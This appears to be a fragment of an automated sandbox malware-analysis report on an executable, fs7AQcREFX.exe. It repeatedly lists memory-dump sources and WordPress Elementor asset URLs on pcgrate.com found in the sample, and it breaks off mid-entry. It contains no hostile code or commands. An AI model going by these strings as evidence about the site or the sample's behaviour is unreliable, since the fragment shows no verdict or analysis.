                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 